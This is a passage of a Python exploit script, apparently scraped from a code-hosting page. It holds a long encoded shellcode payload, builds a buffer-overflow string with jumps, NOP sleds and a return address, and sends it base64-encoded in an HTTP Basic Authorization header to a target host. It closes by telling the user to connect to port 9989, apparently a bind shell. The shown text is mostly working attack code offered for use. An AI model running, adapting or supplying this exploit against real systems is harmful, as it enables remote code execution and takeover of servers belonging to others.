payload += "\xc9\xb1\x53\x31\x50\x12\x83\xc0\x04\x03\x34\xd5\x71"
|
||||
payload += "\x12\x48\x01\xf7\xdd\xb0\xd2\x98\x54\x55\xe3\x98\x03"
|
||||
payload += "\x1e\x54\x29\x47\x72\x59\xc2\x05\x66\xea\xa6\x81\x89"
|
||||
payload += "\x5b\x0c\xf4\xa4\x5c\x3d\xc4\xa7\xde\x3c\x19\x07\xde"
|
||||
payload += "\x8e\x6c\x46\x27\xf2\x9d\x1a\xf0\x78\x33\x8a\x75\x34"
|
||||
payload += "\x88\x21\xc5\xd8\x88\xd6\x9e\xdb\xb9\x49\x94\x85\x19"
|
||||
payload += "\x68\x79\xbe\x13\x72\x9e\xfb\xea\x09\x54\x77\xed\xdb"
|
||||
payload += "\xa4\x78\x42\x22\x09\x8b\x9a\x63\xae\x74\xe9\x9d\xcc"
|
||||
payload += "\x09\xea\x5a\xae\xd5\x7f\x78\x08\x9d\xd8\xa4\xa8\x72"
|
||||
payload += "\xbe\x2f\xa6\x3f\xb4\x77\xab\xbe\x19\x0c\xd7\x4b\x9c"
|
||||
payload += "\xc2\x51\x0f\xbb\xc6\x3a\xcb\xa2\x5f\xe7\xba\xdb\xbf"
|
||||
payload += "\x48\x62\x7e\xb4\x65\x77\xf3\x97\xe1\xb4\x3e\x27\xf2"
|
||||
payload += "\xd2\x49\x54\xc0\x7d\xe2\xf2\x68\xf5\x2c\x05\x8e\x2c"
|
||||
payload += "\x88\x99\x71\xcf\xe9\xb0\xb5\x9b\xb9\xaa\x1c\xa4\x51"
|
||||
payload += "\x2a\xa0\x71\xcf\x22\x07\x2a\xf2\xcf\xf7\x9a\xb2\x7f"
|
||||
payload += "\x90\xf0\x3c\xa0\x80\xfa\x96\xc9\x29\x07\x19\xd2\xac"
|
||||
payload += "\x8e\xff\x76\xbf\xc6\xa8\xee\x7d\x3d\x61\x89\x7e\x17"
|
||||
payload += "\xd9\x3d\x36\x71\xde\x42\xc7\x57\x48\xd4\x4c\xb4\x4c"
|
||||
payload += "\xc5\x52\x91\xe4\x92\xc5\x6f\x65\xd1\x74\x6f\xac\x81"
|
||||
payload += "\x15\xe2\x2b\x51\x53\x1f\xe4\x06\x34\xd1\xfd\xc2\xa8"
|
||||
payload += "\x48\x54\xf0\x30\x0c\x9f\xb0\xee\xed\x1e\x39\x62\x49"
|
||||
payload += "\x05\x29\xba\x52\x01\x1d\x12\x05\xdf\xcb\xd4\xff\x91"
|
||||
payload += "\xa5\x8e\xac\x7b\x21\x56\x9f\xbb\x37\x57\xca\x4d\xd7"
|
||||
payload += "\xe6\xa3\x0b\xe8\xc7\x23\x9c\x91\x35\xd4\x63\x48\xfe"
|
||||
payload += "\xf4\x81\x58\x0b\x9d\x1f\x09\xb6\xc0\x9f\xe4\xf5\xfc"
|
||||
payload += "\x23\x0c\x86\xfa\x3c\x65\x83\x47\xfb\x96\xf9\xd8\x6e"
|
||||
payload += "\x98\xae\xd9\xba"
|
||||
|
||||
|
||||
|
||||
exploit = "AAAA:" + "B"*442 + "\xeb\x64" + (nop*2) + ret + (nop*266) +"\xeb\x10" + (nop*109) + payload + (nop * (400-len(payload)))
|
||||
|
||||
|
||||
request = "GET / HTTP/1.1\r\n" + "Host: " + rhost + ":" + str(rport) + "\r\n" + "Authorization: Basic " + base64.b64encode(exploit) + "\r\n\r\n"
|
||||
|
||||
print ("Attacking " + rhost + ":" + str(rport))
|
||||
|
||||
#Connect to the target
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((rhost,rport))
|
||||
#Send exploit
|
||||
s.send(request)
|
||||
s.close()
|
||||
|
||||
print ("Try to connect on port 9989.")
|
Loading…
Add table
Reference in a new issue